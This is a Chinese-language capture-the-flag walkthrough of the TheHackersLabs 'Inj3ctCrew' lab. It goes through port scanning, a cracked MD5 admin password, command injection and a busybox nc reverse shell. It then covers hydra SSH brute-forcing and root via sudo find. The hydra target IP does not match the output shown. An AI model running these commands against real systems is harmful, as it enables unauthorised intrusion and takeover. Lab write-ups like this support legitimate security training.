Inj3ctCrew

image

靶机地址:https://labs.thehackerslabs.com/machine/161

信息搜集

192.168.100.66

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 192.168.100.66                                          [19:33:10]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.66:22
Open 192.168.100.66:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 19:33 CST
Initiating ARP Ping Scan at 19:33
Scanning 192.168.100.66 [1 port]
Completed ARP Ping Scan at 19:33, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:33
Completed Parallel DNS resolution of 1 host. at 19:33, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 19:33
Scanning 192.168.100.66 [2 ports]
Discovered open port 22/tcp on 192.168.100.66
Discovered open port 80/tcp on 192.168.100.66
Completed SYN Stealth Scan at 19:33, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.66
Host is up, received arp-response (0.00046s latency).
Scanned at 2026-01-22 19:33:25 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:03:0C:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80/tcp扫描

1

有个backup文件,访问并查看源码

image

说了重要信息在PwnedCredentials.html

继续访问一下。获得了用户凭证

image

但是密码是md5加密过的,需要解密

https://www.cmd5.com/default.aspx

image

Admin:qwerty

去/login.php登录

是一个命令执行的面板且没有过滤

image

www shell

既然可以执行命令,那么直接弹shell

1
busybox nc 192.168.100.31 7777 -e /bin/bash

image

提权

www -> nolen11

用户枚举

1
cat /etc/passwd | grep "home"

image

ssh爆破

使用hydra爆破nolen11

1
hydra -l nolen11 -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.31
1
[22][ssh] host: 10.0.2.10   login: nolen11   password: 987654321

nolen11:987654321

nolen11 -> root

1
2
3
4
5
6
nolen11@TheHackersLabs-Inj3ctCrew:/home$ sudo -l
Matching Defaults entries for nolen11 on TheHackersLabs-Inj3ctCrew:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User nolen11 may run the following commands on TheHackersLabs-Inj3ctCrew:
    (ALL) NOPASSWD: /usr/bin/find

可以无需密码以所有用户(包括 root)身份执行 /usr/bin/find 命令

gtfobins有现成的方案

https://gtfobins.org/gtfobins/find/

image

1
2
3
4
nolen11@TheHackersLabs-Inj3ctCrew:/home$ sudo /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root
#